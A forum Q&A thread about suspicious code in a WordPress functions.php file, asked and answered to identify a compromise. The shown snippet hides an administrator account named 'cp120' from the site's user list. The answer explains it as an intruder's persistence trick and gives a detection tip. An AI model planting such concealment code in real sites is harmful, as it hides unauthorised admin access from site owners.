Malicious code in website stealing admin password

Question

I have a client that said they think there site is being hacked. I looked at some stuff and found some suspicious code in their functions.php file. Does anyone recognize any of this and feel its not right?

add_action('pre_user_query','yoursite_pre_user_query');
function yoursite_pre_user_query($user_search) {
global $current_user;
$username = $current_user->user_login;
if ($username == 'admin') { 
 global $wpdb;
 $user_search->query_where = str_replace('WHERE 1=1',
   "WHERE 1=1 AND {$wpdb->users}.user_login != 'cp120'",$user_search->query_where);
  }
}

Answer 1

This code, or similar markup is sometimes used by Wordpress hackers. Once they gain access to your Wordpress admin via malicious methods they create a legitimate admin user and then put this code in your functions.php file so that when you go to your admin user section it only displays 1 user. Here is the trick to see if this has happened to you incase you are unfamiliar with php pr don't want to look through a long functions.php file. Go to your admin user area and it will only display the admin users that you know of however the number next to admin users will not match the number of displayed users. it will say (4) but only show 3 names.

As a note this code can be used for legitimate reasons so make sure if you find this that it wasn't done by your site's admin or developer.